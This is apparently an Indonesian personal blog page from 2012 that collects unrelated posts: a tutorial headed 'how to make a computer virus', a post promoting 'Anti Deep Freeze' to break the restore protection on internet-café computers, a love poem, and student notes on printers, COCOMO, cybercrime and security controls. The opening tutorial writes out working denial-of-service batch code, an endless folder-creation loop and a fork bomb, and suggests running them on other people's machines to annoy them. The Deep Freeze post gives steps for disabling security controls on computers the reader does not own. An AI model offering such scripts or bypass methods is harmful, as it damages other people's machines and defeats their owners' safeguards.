Selasa, 18 Desember 2012

CARA MEMBUAT VIRUS DI KOMPUTER

Cara Membuat Virus Komputer Dengan Mematikan Dan Berbahaya - Pada postingan kali ini saya akan berbagi tips tutorial bagaimana cara membuat virus komputer yang mudah dengan menggunakan notepad. Virus komputer adalah suatu program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.

Ada berbagai jenis Virus komputer, mulai dari Virus tidak berbahaya sampai yang mematikan dan merusak perangkat keras dengan cara memuat program yang memaksa over process ke perangkat tertentu. Akibatnya komputer yang terserang virus akan cepat hang dan rusak.

Terdapat berbagai program/software untuk membuat virus komputer antara lain : C++, seprty, VB, pascal, Phyton yang tentunya menggunakan bahasa pemograman yang cukup sulit. Kali ini kita akan belajar cara membuat yang mudah yaitu hanya menggunakan notepad.

Cara Membuat Virus Komputer Dengan Notepad

  • Membuat virus yang Akan Membuat 1.000 Folder Dalam beberapa detik
    Berikut ini virus sederhana yang akan membuat sejumlah unlimmited folder di tempat yang anda inginkan. Tentunya akan kewalahan juga kalau ada 1000 folder yg tampil dalam beberapa detik…

    Langkah pertama :
    buka notepad dan ketik :
    @echo off
    :top
    md %random%
    goto top

    @ Echo off membuatnya sehingga tampaknya menjadi layar kosong tetapi sebenarnya ratusan pembuatan folder.
    Md %random% adalah perintah yang membuat folder dengan nama acak.
    goto top – kembali ke label: atas
    Langkah selanjutnya simpan misal dengan nama 1000folders.bat
    Setelah itu kamu akan mendapatkan ikon yang terlihat seperti ditunjukkan di bawah ini

    Jika ada orang yang menjalankan file 1000folders.bat maka akan terdapat 1000 folder yang dijamin akan membuat mereka kesal
     
  • Cara Membuat Virus Komputer Sederhana – Bom ForkMenjalankan fork  bom akan menyebabkan kemacetan total CPU karena komputer dipaksa membuka sekitar 500 proses command prompt secara berantai sehingga komputer akan kelebihan beban dan kemungkinan besar komputer akan hang.
    Cara membuat virus Bom Fork ini masih menggunakan Notepad, Buka Notepad dan ketik “%0|%0” (tanpa tanda kutip)



    Setelah itu save file tersebut dengan exstensi .bat, caranya klik file-->Save as .bat , sebagai contoh fork.bat

    Menjalankan File .bat yang kamu buat pada langkah 2, setelah sebuah bom yang sukses telah diaktifkan dalam sistem, mungkin harus reboot untuk mengembalikannya normal.
NB : Tips ini hanya untuk pembelajaran dan bukan untuk pembelajaran.
Demikianlah tips cara praktis membuat virus komputer sederhana dengan notepad. Ingat ya, Tips ini hanya untuk pembelajaran dan segala resiko ditanggung penumpang.Semoga bermamfaat dan tidak disalah gunakan

Sabtu, 03 November 2012

pemudaindonesiabaru.blogspot.com/.../download-games-terbaru-201...Cache
Download Games Terbaru 2012 - Bagi kamu pengemar games, berikut kami akan membagi tempat download games untuk PC, HP gratis buat anda semua.

Anti Deep Freeze, Software untuk Membobol Deep Freeze Warnet

Anti Deep Freeze. Ini adalah postingan Berita Terkini setahun yang lalu, tetapi akan saya ulas lagi kali ini. Postingan lalu di: Anti Deep Freeze, software untuk mengHack dan membobol Deep Freeze Warnet. Hilang di SERP Google. Saya angkat lagi disini kali aja ada yang masih membutuhkan software ini. Software/Aplikasi untuk membobol Deep Freeze Warnet.

Deep Freeze. Suatu software komputer yang biasanya digunakan pada warnet-warnet. Fungsi Deep Freeze adalah untuk mengamankan data-data dan melindungi data atau mencegah hal yang tidak diinginkan saat suatu komputer di warnet tersebut dipakai oleh klien, biasanya mencegah adanya virus.

Cara kerja Deep Freeze sendiri adalah mengembalikan data seperti semula saat komputer direstart. Gampangnya, saat Deep Freeze aktif dan virus menyerang komputer, komputer kita restart. Maka semua data-data kita akan kembali seperti semula saat kita mengatur pertama kali dan tentunya virus akan otomatis hilang.

Jika kita memakai suatu komputer di warnet yang cara mengaktifkan Deep Freeze, maka kita tidak bisa menginstall suatu software apapun. Jika kita instal pasti akan balik lagi pengaturannya seperti semula.

Untuk mengakali itu kita harus pake trik cara hack Deep Freeze, Triknya pun mudah dan ampuh untuk mengHack Deep Freeze di Warnet. Kita cukup mendownload software untuk membobol Deep Freeze. Nama softwarenya adalah, Anti Deep Freeze. Software ini sangat ampuh untuk membobol segala versi Deep Freeze, baik versi 4, versi 5, versi 6 standart maupun evaluation. Cara Anti Deep Freeze ini bekerja adalah hanya menonaktifkan Deep Freeze itu sendiri. Pokoknya software Anti Deep Freeze ini sangat ampuhlah untuk menghapus, menghilangkan, menonaktifkan dan membobol Deep Freeze. :D
Setelah anda download dan install. Selanjutnya cara penggunaanya pun sangat mudah. Tinggal tekan CTRL+SIFT+ALT+F6, maka akan muncul Deep Freeze. Buka Anti Deep Freeze yang telah diinstal tadi dan pilih Deep Freeze versi apa yang terpasang di komputer itu. Klik Apply. Maka komputer tersebut telah terhindar dari Deep Freeze.

Anda tinggal mendownloadnya disini. Dan anda akan mendapatkan software Anti Deep Freeze yang full version tanpa password dan crack, pokokna gratis dan lengkap deh. Ikuti link dibawah ini :

Update Anti Deep Freeze Terbaru
Ternyata masih banyak juga peminat dari anti deepfreeze ini melihat dari komentar yang ada. Sekali lagi mohon maaf bila link diatas sudah tidak berfungsi dengan baik lagi bila berhadapan dengan Deep Freeze Terbaru. Maka kali ini akan saya update Anti Deep Freeze Terbaru.

ANTI DEEP FREEZE 0.4

Anti DeepFreeze ini sudah bisa untuk menjebol Deep Freeze versi 7, termasuk juga adik adiknya (versi 7 kebawah). Didalem filenya sudah terdapat cara pemakaian Anti Deep Freeze ini.

 



Sekeder untuk mengingatkan pengguna anti deep freeze ini. Gunakanlah untuk kebaikan. Tuhan tidak pernah tidur dan mengetahui perbuatan agan" sekalian yang berbuat jahat. Hehehe.

Senin, 22 Oktober 2012

dulu kau adalah orang yg menyayangiku..
orang yg membuat hidupku tersa indah..
indah dengan cintamu itu..
cinta yg masih ku rasakan padamu saat ini
sesungguhnya hati ini tak rela kau pergi..
pergi meninggalkan kisah kita..
pergi dan menyisakan kenangan..
kenangan yg tak mungkin ku lupa..
mantan..
di sana telah ada yg memilikimu..
memiliki cinta yg pernah kau beri untukku..
memiliki sesuatu yg indah seperti yg kau beri dulu..
mantan..
mungkin saat ini kita telah berpisah..
berpisah untuk menghentikan kisah kita..
kisah yg tak bisa kulupakan..
mantan..
terima kasih atas semuanya..
cinta, sayang, dan kasihmu yg dulu kau beri..
sampai kapanpun dirimu takkan ku lupa..
mantan..
you always in my heart..
now, tomorrow, and forever..
love you..

Senin, 08 Oktober 2012

jenis jenis printer

Pengertian Printer, Jenis-Jenis Printer pada postingan kali ini saya akan membahas mengenai tema di atas. Mungkin Anda sudah banyak yang mengetahui apa itu Printer, jenis-jenis printer, dan juga cara mengoperasikannya, tetapi pada artikel yang saya tulis kali ini saya akan memperkenalkan kepada Anda yang merupakan pemula untuk mengetahui tentang Printer, Jenis-Jenis PrinterMengoperasikannya. Langsung saja Kita simak dalam artikel berikut.Pengertian Printer adalah alat untuk mencetak data yang dikirim oleh komputer, baik berupa teks, gambar, tabel, atau pun foto. Setelah data tersebut Anda kirimkan dari komputer, kemudian Anda memerintahkan untuk memproses data, printer akan memprosesnya dan akan mencetaknya ke kertas yang sudah Anda sediakan. Pada gambar berikut ini saya akan menunjukkan bagian-bagian yang terdapat pada printer:
Bagian-Bagian pada Printer
Pada gambar di atas merupakan gambaran bagian-bagian dari printer pada umumnya. Selain bagian-bagian pada printer di atas, printer juga mempunyai komponen yang lain, sebagai contoh adalah kabel data, power adaptor, dan yang paling penting adalah Cartridge.
Jenis-jenis Printer di kelompokkan ke dalam beberapa tipe yakni:
1. Printer Dot Matrix
Contoh Printer Dot Matrix

Printer dengan teknologi Dot Matrix ini menggunakan alat semacam jarum dalam menghasilkan sebuah cetakan baik itu berbentuk teks, tabel, maupun gambar. Model dan jumlah jarum yang dipakai sangat bervariasi untuk setiap produsennya. Saya contohkan, printer jenis ini dapat Anda temukan pada wartel, supermarket, apotik, atau pun perusahaan pembiayaan. Model printer ini menggunakan semacam pita berwarna dalam menghasilkan cetakan.


2. Printer Bubble Jet
Contoh Printer Bubble Jet

Printer jenis ini masih bertahan hingga sekarang dan terus berkembang hingga saat ini. Teknologi ini lebih diminati oleh banyak orang, karena hasil cetakannya lebih baik dan lebih cepat jika dibandingkan dengan teknologi sebelumnya seperti Dot Matrix. Model tintanya pun berbentuk cairan yang warnanya bermacam-macam tergantung pada setiap teknologi yang dimiliki oleh printer jenis ini, seperti contoh RGB(Red Green Blue) atau pun CMYK(Cyan Magenta Yellow Black) setiap teknologi warna di atas memiliki kelebihan dan kekurangan masing-masing.

3. Printer Laser Jet
Contoh Printer Laser Jet

Pada tipe ini menggunakan Laser sebagai alat dalam menghasilkan cetakan. Sistem kerjanya hampir sama dengan mesin foto copy, dimana tintanya berbentuk serbuk yang di lewatkan pada alat pemanas dengan suhu yang sangat tinggi.



Senin, 10 September 2012

sElamaT daTanG di bloG adicahpunkidz!!


http://www.blogger.com/blogger.g?blogID=2547030210319262638#editor/target=post;postID=5406168315903224925

Senin, 04 Juni 2012

kriteria manager proyek yang baik

Yang dimaksud dengan manager adalah orang atau seseorang yang harus mampu membuat orang-orang dalam organisasi yang berbagai karakteristik, latar belakang budaya, akan tetapi memiliki ciri yang sesuai dengan tujuan (goals) dan teknologi (technology). Dan tugas seorang manager adalah bagaimana mengintegrasikan berbagai macam variabel (karakteristik, budaya, pendidikan dan lain sebagainya) kedalam suatu tujuan organisasi yang sama dengan cara melakukan mekanisme penyesuaian. Adapun mekanisme yang diperlukan untuk menyatukan variabel diatas adalah sebagai berikut: • Pengarahan (direction) yang mencakup pembuatan keputusan, kebijaksanaan, supervisi, dan lain-lain. • Rancangan organisasi dan pekerjaan. • Seleksi, pelatihan, penilaian, dan pengembangan. • Sistem komunikasi dan pengendalian. • Sistem reward. Hal tersebut memang tidak mengherankan karena posisi Manajer Proyek memegang peranan kritis dalam keberhasilan sebuah proyek terutama di bidang teknologi informasi. Berikut ini kualifikasi teknis maupun nonteknis yang harus dipenuhi seorang Manajer Proyek yang saya sarikan dari IT Project Management Handbook. Setidaknya ada 3 (tiga) karakteristik yang dapat digunakan untuk mengukur tingkat kualifikasi seseorang untuk menjadi Manajer Proyek yaitu: • Karakter Pribadinya yang memiliki pemahaman yang menyeluruh mengenai teknis pekerjaan dari proyek yang dikelola olehnya, yang mampu bertindak sebagai seorang pengambil keputusan yang handal dan bertanggung jawab serta yang memiliki integritas diri yang baik namun tetap mampu menghadirkan suasana yang mendukung di lingkungan tempat dia bekerja. • Karakteristik Kemampuan Terkait dengan Proyek yang Dikelola • Karakteristik Kemampuan Terkait dengan Tim yang Dipimpin referensi : http://saiiamilla.wordpress.com/

Software untuk pengujian perangkat lunak

Pengujian perangkat lunak (Bahasa Inggris: software testing) merupakan suatu investigasi yang dilakukan untuk mendapatkan informasi mengenai kualitas dari produk atau layanan yang sedang diuji (under test). Pengujian perangkat lunak juga memberikan pandangan mengenai perangkat lunak secara obyektif dan independen, yang bermanfaat dalam operasional bisnis untuk memahami tingkat risiko pada implementasinya. Teknik-teknik pengujian mencakup, namun tidak terbatas pada, proses mengeksekusi suatu bagian program atau keseluruhan aplikasi dengan tujuan untuk menemukan bug perangkat lunak. Software pengujian merupakan investigasi dilakukan untuk memberikan stakeholder dengan informasi tentang kualitas produk atau jasa sedang diuji. Software pengujian juga menyediakan independen, objektif perangkat lunak untuk memungkinkan bisnis untuk menghargai dan memahami risiko pada pelaksanaan perangkat lunak. teknik uji meliputi, tetapi tidak terbatas, proses eksekusi sebuah program atau aplikasi dengan tujuan menemukan bug perangkat lunak . Software pengujian juga dapat dinyatakan sebagai proses untuk memvalidasi dan memverifikasi bahwa program software / aplikasi / produk: 1. memenuhi persyaratan bisnis dan teknis bahwa desain yang dibimbing dan pengembangan; 2. bekerja seperti yang diharapkan, dan 3. dapat diimplementasikan dengan karakteristik yang sama. model pengembangan perangkat lunak yang berbeda-beda akan memfokuskan upaya uji pada titik-titik yang berbeda dalam proses pembangunan. model-model pembangunan yang lebih baru, seperti Agile , sering menggunakan didorong pengembangan tes dan menempatkan porsi peningkatan pengujian di tangan pengembang, sebelum mencapai sebuah tim penguji formal. Dalam model yang lebih tradisional, sebagian besar terjadi setelah pelaksanaan tes persyaratan yang telah dibuat dan proses pengkodean telah selesai. Sumber : http://id.wikipedia.org/wiki/Pengujian_perangkat_lunak http://bagusalfiyanto.blogspot.com/2010/06/software-pengujian-perangkat-lunak.html

Kamis, 31 Mei 2012

presentasi cybercrime

COCOMO

COCOMO Pengertian cocomo adalah sebuah model yang digunakan untuk memperkirakan jumlah orang/bulan yang diperlukan untuk mengembangkan sebuah perangkat lunak. Jenis-jenis cocomo : 1.Model COCOMO Dasar Model COCOMO dapat diaplikasikan dalam tiga tingkatan kelas: Proyek organik (organic mode)Adalah proyek dengan ukuran relatif kecil,dengan anggota tim yang sudah berpengalaman, dan mampu bekerja pada permintaan yang relatif fleksibel. Proyek sedang(semi-detached mode) Merupakan proyek yang memiliki ukurandan tingkat kerumitan yang sedang, dan tiap anggota tim memiliki tingkatkeahlian yang berbeda Proyek terintegrasi(embedded mode) Proyek yang dibangun dengan spesifikasidan operasi yang ketat 2. Intermediete COCOMO Intermediate COCOMO menghitung usaha pengembangan perangkat lunak sebagai fungsi ukuran program dan sekumpulan “cost drivers” yang mencakup penilaian subjektif produk, perangkat keras, personil dan atribut proyek. Ekstensi ini mempertimbangkan satu set empat “cost drivers”, yang dijabarkan dalam kategori dan subkatagori sebagai berikut : a. Atribut produk (product attributes) * Reliabilitas perangkat lunak yang diperlukan (RELY) * Ukuran basis data aplikasi (DATA) * Kompleksitas produk (CPLX) b. Atribut perangkat keras (computer attributes) * Waktu eksekusi program ketika dijalankan (TIME) * Memori yang dipakai (STOR) * Kecepatan mesin virtual (VIRT) * Waktu yang diperlukan untuk mengeksekusi perintah (TURN) c. Atribut sumber daya manusia (personnel attributes) * Kemampuan analisis (ACAP) * Kemampuan ahli perangkat lunak (PCAP) * Pengalaman membuat aplikasi (AEXP) * Pengalaman penggunaan mesin virtual (VEXP) * Pengalaman dalam menggunakan bahasa pemrograman (LEXP) d. Atribut proyek (project attributes) * Penggunaan sistem pemrograman modern(MODP) * Penggunaan perangkat lunak (TOOL) * Jadwal pengembangan yang diperlukan (SCED) 3. Detailed COCOMO Detil COCOMO – menggabungkan semua karakteristik versi intermediate dengan penilaian dampak cost driver di setiap langkah (analisis, desain, dll) dari proses rekayasa perangkat lunak 1. model rinci kegunaan yang berbeda upaya pengali untuk setiap driver biaya atribut Tahap pengganda ini upaya Sensitif masing-masing untuk menentukan jumlah usaha yang dibutuhkan untuk menyelesaikan setiap tahap. Pada COCOMO rinci, upaya dihitung sebagai fungsi dari ukuran program dan satu set driver biaya yang diberikan sesuai dengan tiap tahap siklus hidup rekayasa perangkat lunak. Fase yang digunakan dalam COCOMO rinci perencanaan kebutuhan dan perancangan perangkat lunak, perancangan detil, kode dan menguji unit, dan pengujian integrasi. Sumber: http://www.scribd.com/doc/81758764/Tugas-COCOMO http://dwiyuliani-dwiyuliani.blogspot.com/2011/04/cocomo.html

Rabu, 04 April 2012

Alasan dianjurkan menggunakan software open source

Alasan mengapa diajurkan menggunakan software yang open source, yang pertama jelas karena software yang open source itu tidak berbayar atau gratisan, kedua kita dapat membantu penghematan devisa ke luar negeri karena kita tidak membeli software asing. Ketiga, kita diberi kesempatan untuk megubah pada kode Open Source sesuai dengan kebutuhan kita.
Kelebihan software open source:
1. Ketersediaan kode sumber dan hak untuk memodifikasi
2. Hak untuk mendistribusikan modifikasi dan perbaikan kode
3. Hak untuk menggunakan perangkat lunak dengan cara apapun.

Kelemahan software open source:
Software yang open source ada kalanya sering terjadi hole atau bug yang tidak ada yang paham Maka langkah yang mungkin ditempuh adalah : searching problem solving di forum-forum, tanya sana sini. Jika tidak ketemu juga, kita bisa-bisa harus menganggarkan dana yang tidak sedikit untuk mendatangkan jasa konsultan dari pakar opensource tersebut.


http://eu.conecta.it/paper/Advantages_open_source_soft.html
http://rijaljuarez.blogspot.com/2010/05/kekurangan-dan-kelebihan-open-source.html

Kamis, 22 Maret 2012

PENGEMBANGAN SISTEM INFORMASI PELAYANAN INFORMASI DAN PENDAFTARAN SECARA ONLINE DI RUMAH SAKIT MISI RANGKASBITUNG

ABSTRAKSI

Tuntutan pelayanan informasi untuk pasien di suatu rumah sakit semakin meningkat, pelayanan ini meliputi kemudahan dalam mengakses informasi yang dibutuhkan oleh pasien dan kemudahan dalam berbagai tindakan seperti mendaftar untuk konsultasi dengan dokter atau berobat jalan. Untuk meningkatkan pelayanan yang lebih baik kepada pasien dalam hal pelayanan akses data dan informasi diperlukan adanya suatu wadah yang dapat memberikan layanan yang lebih baik, oleh karena itu system pelayanan informasi secara online ini dibuat. Dengan adanya layanan informasi dan pendaftaran secara online ini, kegiatan mengantre dan menunggu giliran konsultasi dengan dokter yang menghabiskan banyak waktu dapat dihindari, karena program dapat mengatur jadwal sedemikian rupa sehingga pasien dapat datang sesuai jadwal yang telah di tentukan oleh program. Selain itu seorang dokter dapat mengakses data rekap medis seorang pasien yang sebelumnya ditangani oleh dokter yang berbeda namun masih dalam lingkungan rumah sakit tersebut. Program ini menggunkan Database Management System yang terintegrasi. Dengan adanya program ini diharapkan dapat memberikan pelayanan yang lebih baik kepada para pasien rumah sakit.

Kata kunci : Informasi, Online, Database Manajemen Sistem

Selasa, 06 Maret 2012

Modus Kejahatan dalam TI

Kriminalitas di internet atau cybercrime pada dasarnya adalah suatu tindak pidana yang berkaitan dengan cyberspace, baik yang menyerang fasilitas umum di dalam cyberspace ataupun kepemilikan pribadi. Cybercrime merupakan fenomena sosial yang membuka cakrawala keilmuan dalam dunia hukum, betapa suatu kejahatan yang sangat dasyat dapat dilakukan dengan hanya duduk manis di depan komputer. Cybercrime merupakan sisi gelap dari kemajuan tehnologi komunikasi dan informasi yang membawa implikasi sangat luas dalam seluruh bidang kehidupan karena terkait erat dengan economic crime dan organized crimes. Jenis-jenis kejahatan di internet terbagi dalam berbagai versi. Salah satu versi menyebutkan bahwa kejahatan ini terbagi dalam dua jenis, yaitu kejahatan dengan motif intelektual. Biasanya jenis yang pertama ini tidak menimbulkan kerugian dan dilakukan untuk kepuasan pribadi. Jenis kedua adalah kejahatan dengan motif politik, ekonomi atau kriminal yang berpotensi menimbulkan kerugian bahkan perang informasi. Versi lain membagi cybercrime menjadi tiga bagian yaitu pelanggaran akses, pencurian data, dan penyebaran informasi untuk tujuan kejahatan.
MODUS OPERANDI
Menurut RM. Roy Suryo dalam Warta Ekonomi No. 9, 5 Maret 2001 h.12, kasus-kasus cybercrime yang banyak terjadi di Indonesia setidaknya ada tiga jenis berdasarkan modusnya, yaitu:
1. Pencurian Nomor Kartu Kredit.
Menurut Rommy Alkatiry (Wakil Kabid Informatika KADIN), penyalahgunaan kartu kredit milik orang lain di internet merupakan kasus cybercrime terbesar yang berkaitan dengan dunia bisnis internet di Indonesia. Penyalahgunaan kartu kredit milik orang lain memang tidak rumit dan bisa dilakukan secara fisik atau on-line. Nama dan kartu kredit orang lain yang diperoleh di berbagai tempat (restaurant, hotel atau segala tempat yang melakukan transaksi pembayaran dengan kartu kredit) dimasukkan di aplikasi pembelian barang di internet.
2. Memasuki,memodifikasi, atau merusak homepage(hacking).
Menurut John. S. Tumiwa pada umumnya tindakan hacker Indonesia belum separah aksi di luar negeri. Perilaku hacker Indonesia baru sebatas masuk ke suatu situs komputer orang lain yang ternyata rentan penyusupan dan memberitahukan kepada pemiliknya untuk berhati-hati. Di luar negeri hacker sudah memasuki sistem perbankan dan merusak data base bank.
3. Penyerangan situs atau e-mail melalui virus atau spamming.
Modus yang paling sering terjadi adalah mengirim virus melalui e-mail. Menurut RM. Roy Suryo, di luar negeri kejahatan seperti ini sudah diberi hukuman yang cukup berat. Berbeda dengan di Indonesia yang sulit diatasi karena peraturan yang ada belum menjangkaunya.
Jenis Cybercrime
Berdasarkan jenis aktifitas yang dilakukannya, cybercrime dapat digolongkan menjadi beberapa jenis sebagai berikut:
a. Unauthorized Access
kejahatan yang terjadi ketika seseorang memasuki atau menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin, atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Probing dan port merupakan contoh kejahatan ini.
b. Illegal Contents
kejahatan yang dilakukan dengan memasukkan data atau informasi ke internet tentang suatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau menggangu ketertiban umum, contohnya adalah penyebaran pornografi.
c. Penyebaran virus secara sengaja
Penyebaran virus pada umumnya dilakukan dengan menggunakan email. Sering kali orang yang sistem emailnya terkena virus tidak menyadari hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya.
d. Data Forgery
Kejahatan yang dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.
e. Cyber Espionage, Sabotage, and Extortion
Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran.
f. Cyberstalking
Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer.
g. Carding
Carding merupakan kejahatan yang dilakukan untuk mencuri nomor kartu kredit milik orang lain dan digunakan dalam transaksi perdagangan di internet.
h. Hacking dan Cracker
Istilah hacker biasanya mengacu pada seseorang yang punya minat besar untuk mempelajari sistem komputer secara detail dan bagaimana meningkatkan kapabilitasnya. Adapun mereka yang sering melakukan aksi-aksi perusakan di internet lazimnya disebut cracker. Boleh dibilang cracker ini sebenarnya adalah hacker yang yang memanfaatkan kemampuannya untuk hal-hal yang negatif.
i. Cybersquatting and Typosquatting
Cybersquatting merupakan kejahatan yang dilakukan dengan mendaftarkan domain nama perusahaan orang lain dan kemudian berusaha menjualnya kepada perusahaan tersebut dengan harga yang lebih mahal.
j. Hijacking
Hijacking merupakan kejahatan melakukan pembajakan hasil karya orang lain.
k. Cyber Terorism
Suatu tindakan cybercrime termasuk cyber terorism jika mengancam pemerintah atau warganegara, termasuk cracking ke situs pemerintah atau militer. Beberapa contoh kasus Cyber Terorism sebagai berikut :
• Ramzi Yousef, dalang penyerangan pertama ke gedung WTC, diketahui menyimpan detail serangan dalam file yang di enkripsi di laptopnya.
• Osama Bin Laden diketahui menggunakan steganography untuk komunikasi jaringannya.
• Suatu website yang dinamai Club Hacker Muslim diketahui menuliskan daftar tip untuk melakukan hacking ke Pentagon.
• Seorang hacker yang menyebut dirinya sebagai DoktorNuker diketahui telah kurang lebih lima tahun melakukan defacing atau mengubah isi halaman web dengan propaganda anti-American, anti-Israel dan pro-Bin Laden.



Berdasarkan Motif Kegiatan
Berdasarkan motif kegiatan yang dilakukannya, cybercrime dapat digolongkan menjadi dua jenis sebagai berikut :
a. Cybercrime sebagai tindakan murni kriminal
b. Cybercrime sebagai kejahatan ”abu-abu”

Berdasarkan Sasaran Kejahatan
Sedangkan berdasarkan sasaran kejahatan, cybercrime dapat dikelompokkan menjadi beberapa kategori seperti berikut ini :

a. Cybercrime yang menyerang individu (Against Person)
Beberapa contoh kejahatan ini antara lain :
• Pornografi
Kegiatan yang dilakukan dengan membuat, memasang, mendistribusikan, dan menyebarkan material yang berbau pornografi, cabul, serta mengekspos hal-hal yang tidak pantas.
• Cyberstalking
Kegiatan yang dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya dengan menggunakan e-mail yang dilakukan secara berulang-ulang seperti halnya teror di dunia cyber. Gangguan tersebut bisa saja berbau seksual, religius, dan lain sebagainya.
• Cyber-Tresspass
Kegiatan yang dilakukan melanggar area privasi orang lain seperti misalnya Web Hacking. Breaking ke PC, Probing, Port Scanning dan lain sebagainya.

b. Cybercrime menyerang hak milik (Againts Property)

c. Cybercrime menyerang pemerintah (Againts Government)

Penanggulangan Cybercrime
Aktivitas pokok dari cybercrime adalah penyerangan terhadap content, computer system dan communication system milik orang lain atau umum di dalam cyberspace. Fenomena cybercrime memang harus diwaspadai karena kejahatan ini agak berbeda dengan kejahatan lain pada umumnya. Cybercrime dapat dilakukan tanpa mengenal batas teritorial dan tidak memerlukan interaksi langsung antara pelaku dengan korban kejahatan. Berikut ini cara penanggulangannya :
a. Mengamankan sistem
b. Penanggulangan Global






beberapa langkah penting yang harus dilakukan setiap negara dalam penanggulangan cybercrime adalah :
1. melakukan modernisasi hukum pidana nasional beserta hukum acaranya.
2. meningkatkan sistem pengamanan jaringan komputer nasional sesuai standar internasional.
3. meningkatkan pemahaman serta keahlian aparatur penegak hukum mengenai upaya pencegahan, investigasi dan penuntutan perkara-perkara yang berhubungan dengan cybercrime.
4. meningkatkan kesadaran warga negara mengenai masalah cybercrime serta pentingnya mencegah kejahatan tersebut terjadi.
5. meningkatkan kerjasama antarnegara, baik bilateral, regional maupun multilateral, dalam upaya penanganan cybercrime.
Sumber : http://irmarr.staff.gunadarma.ac.id/Downloads/files/11611/Modus+Kejahatan+dalam+TI.doc
http://obyramadhani.wordpress.com/2010/02/26/bab-3-modus-modus-kejahatan-dalam-teknologi-informasi/

Kamis, 12 Januari 2012

Manajemen Kontrol Keamanan

Pentingnya Kontrol

Tujuan pengontrolan adalah untuk memastikan bahwa CBIS telah diimplementasikan seperti yang direncanakan, system beroperasi seperti yang dikehendaki, dan operasi tetap dalam keadaan aman dari penyalahgunaan atau gangguan.

Properti Sistem Yang Memberikan Keamanan
Sebuah system harus mempunyai tiga property (sifat), yaitu :
• Integritas, system akan mempunyai integritas bila ia berjalan menurut spesifikasinya. Perancang system berusaha untuk mengembangkan system yang mempunyai integritas fungsional, yaitu kemampuan untuk melanjutkan operasi, apabila salah satu atau lebih dari komponennya tidak berjalan.
• Audibilitas, ia akan bersifat audible jika ia memiliki visibilitas dan accountability (daya perhitungan). Bila system memiliki audibilitas maka mudah bagi seseorang untuk memeriksa, memverifikasi atau menunjukkan penampilannya.
• Daya kontrol, daya kontrol memungkinan manajer untuk menangani pengerahan atau penghambatan pengaruh terhadap system. Teknik yang efektif untuk mendapatkan daya kontrol system ini adalah dengan membagi system menjadi subsistem yang menangani transaksi secara terpisah.


Tugas Kontrol CBIS
Kontrol CBIS mencakup semua fase siklus hidup. Selama siklus hidup, kontrol dapat dibagi menjadi kontrol-kontrol yang berhubungan dengan pengembangan, disain dan operasi.
Manajer dapat memperoleh kontrol dalam ketiga area secara langsung melalui ahli lain, seperti auditor.

AREA PENGONTROLAN CBIS
 Kontrol Proses Pengembangan
Tujuan dari kontrol pengembangan adalah untuk memastikan bahwa CBIS yang diimplementasikan dapat memenuhi kebutuhan pemakai.
Yang termasuk dalam kontrol pengembangan :
1. Manajemen puncak menetapkan kontrol proyek secara keseluruhan selama fase perencanaan dengan cara membentuk komite MIS
2. Manajemen memberitahu pemakai mengenai orientasi CBIS
3. Manajemen menentukan kriteria penampilan yang digunakan dalam mengevaluasi operasi CBIS.
4. Manajemen dan bagian pelayanan informasi menyusun disain dan standar CBIS
5. Manajemen dan pelayanan informasi secara bersama-sama mendefinisikan program pengujian yang dapat diterima,
6. Manajemen melakukan peninjauan sebelum instalasi yang dilakukan tepat setelah penggantian dan secara berkala meninjau CBIS untuk memastikan apakah ia memenuhi kriteria penampilan.
7. Bagian pelayanan informasi menetapkan prosedur untuk memelihara dan memodifikasi CBIS dan prosedur yang disetujui oleh manajemen.

 Kontrol Disain Sistem
Selama fase disain dan analisis dari siklus hidup system, Analis System, DBA dan Manajer Jaringan membangun fasilitas kontrol tertentu dalam disain system. Selama fase implementasi, programmer menggabungkan kontrol tersebut ke dalam system. Disain system dikontrol dengan cara menggabungkan kontrol software menjadi lima bagian pokok, yaitu :
 Permulaan Transaksi (Transaction Origination)
Tahap-tahap yang harus dilakukan pada permulaan transaksi terdiri atas ;
Ö . Permulaan dokumen sumber
Ö . Kewenangan
Ö . Pembuatan input computer
Ö . Penanganan kesalahan
Ö . Penyimpanan dokumen sumber
 Entri Transaksi (Transaction Entry)
Entri transaksi mengubah data dokumen sumber menjadi bentuk yang dapat dibaca oleh komputer. Kontrol ini berusaha untuk menjaga keakuratan data yang akan ditransmisikan ke jaringan komunikasi atau yang akan dimasukkan secara langsung ke dalam komputer. Area kontrolnya meliputi atas :
Ö . Entri data

Ö . Verifikasi data
Ö . Penanganan kesalahan
Ö . Penyeimbangan batch
 Komunikasi Data (Data Communication)
Komputer yang ada dalam jaringan memberikan peluang risiko keamanan yang lebih besar dari pada komputer yang ada di dalam suatu ruangan. Area kontrol ini terdiri dari :
Ö . Kontrol pengiriman pesan
Ö . Kontrol saluran (channel) komunikasi
Ö . Kontrol penerimaan pesan
Ö . Rencana pengamanan datacom secara menyeluruh
 Pemrosesan Komputer (Computer Processing)
Pada umumnya semua elemen kontrol pada disain system selalu dikaitkan dengan pemasukan data ke dalam komputer. Area kontrol pada pemrosesan komputer terdiri dari :
Ö . Penanganan data
Ö . Penanganan kesalahan
Ö . Database dan perpustakaan software
Sebagian besar kontrol database dapat diperoleh melalui penggunaan Sistem Manajemen Database (Database Management System/DBMS)
Tingkat keamanan dalam DBMS terdiri dari
Ö . Kata kunci (Password)
Ö . Direktori pemakai (User Directory)
Ö . Direktori elemen data (Field Directory)
Ö . Enkripsi (Encryption)


 Output Komputer (Computer Output)
Komponen subsistem ini bertanggung jawab untuk mengirimkan produk (output) kepada pemakai (user). Yang termasuk dalam area ini adalah :
Ö . Penyeimbangan operasi komputer
Ö . Distribusi
Ö . Penyeimbangan departemen pemakai
Ö . Penanganan kesalahan
Ö . Penyimpanan record

 Kontrol Terhadap Pengoperasian Sistem
